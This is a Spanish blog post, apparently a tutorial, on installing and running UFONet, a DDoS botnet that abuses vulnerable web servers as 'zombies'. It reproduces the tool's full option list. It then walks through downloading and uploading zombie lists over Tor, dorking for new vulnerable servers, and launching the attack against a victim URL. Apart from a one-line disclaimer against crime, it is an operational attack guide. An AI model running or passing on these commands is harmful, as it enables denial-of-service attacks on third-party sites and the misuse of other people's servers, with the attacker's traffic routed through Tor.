Ufonet es una botnet para ataques DoS,
que utiliza servidores vulnerables para realizar el ataque.
Nos descargamos Ufonet de:
Descomprimimos
unzip ufonet-master.zip
accedemos a la carpeta ufonet-master
Debemos tener instalado Python 2.x.e
instalar las dependencias (si es que no las tenemos ya instaladas)
apt-get install python (posiblemente ya
lo tengáis instalado).
apt-get install python-pycurl
python-geoip
El modo de usarlo es el siguiente (es
la salida de ./ufonet -h)
Usage: UFONet.py [options] UFONet - DDoS Botnet via Web Abuse - by psy Options: --version show program's version number and exit -h, --help show this help message and exit -v, --verbose active verbose on requests --update check for latest stable version --check-tor check to see if Tor is used properly --force-yes set 'YES' to all questions --disableisup disable external check of target's status --gui run GUI (UFONet Web Interface) *Configure Request(s)*: --proxy=PROXY Use proxy server (tor: 'http://127.0.0.1:8118') --user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED) --referer=REFERER Use another HTTP Referer header (default SPOOFED) --host=HOST Use another HTTP Host header (default NONE) --xforw Set your HTTP X-Forwarded-For with random IP values --xclient Set your HTTP X-Client-IP with random IP values --timeout=TIMEOUT Select your timeout (default 10) --retries=RETRIES Retries when the connection timeouts (default 1) --threads=THREADS Maximum number of concurrent HTTP requests (default 5) --delay=DELAY Delay in seconds between each HTTP request (default 0) *Search for 'Zombies'*: -s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=') --sd=DORKS Search from a list of 'dorks' (ex: --sd 'dorks.txt') --sn=NUM_RESULTS Set max number of results for engine (default 10) --se=ENGINE Search engine to use for 'dorking' (default: duck) --sa Search massively using all search engines *Test Botnet*: -t TEST Update 'zombies' status (ex: -t 'zombies.txt') --attack-me Order 'zombies' to attack you (NAT required!) *Community*: --download-zombies Download 'zombies' from Community server: Turina --upload-zombies Upload your 'zombies' to Community server: Turina --blackhole Create a 'blackhole' to share your 'zombies' --up-to=UPIP Upload your 'zombies' to a 'blackhole' --down-from=DIP Download your 'zombies' from a 'blackhole' *Research Target*: -i INSPECT Search for biggest file (ex: -i 'http://target.com') *Configure Attack(s)*: --disable-aliens Disable 'aliens' web abuse of test services --disable-isup Disable check status 'is target up?' -r ROUNDS Set number of rounds (default: 1) -b PLACE Set place to attack (ex: -b '/path/big.jpg') -a TARGET Start Web DDoS attack (ex: -a 'http(s)://target.com')
Es aconsejable iniciar el servicio tor y privoxy.
En primer lugar, descargamos y
actualizamos zombies:
./ufonet --proxy=http://127.0.0.1:8118
--download-zombies
Contestamos que sí (y)
./ufonet --proxy=http://127.0.0.1:8118
--upload-zombies
Para buscar zombies:
./ufonet --d dorks.txt
Acto seguido, nos pedirá si queremos
actualizar nuestra base de datos de zombies, a lo cual diremos que
sí.
Recomiendo no hacer esto último con
proxys, porque puede dar error.
Para realizar el ataque debemos poner
./ufonet --proxy=http://127.0.0.1:8118
-a <direccion victima con http:// o con https:// incluído>
Si queremos, podemos usar la Gui:
./ufonet --gui
Editando el archivo dorks.txt y
añadiendo más dorks, podremos buscar posbiles zombies
IMPORTANTE: No cometáis delitos.
Sígueme:
- Twitter: @manugomez1977
- Instagram: MANGOMEZ1977
- Facebook: facebook.com/Mangomez1977
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.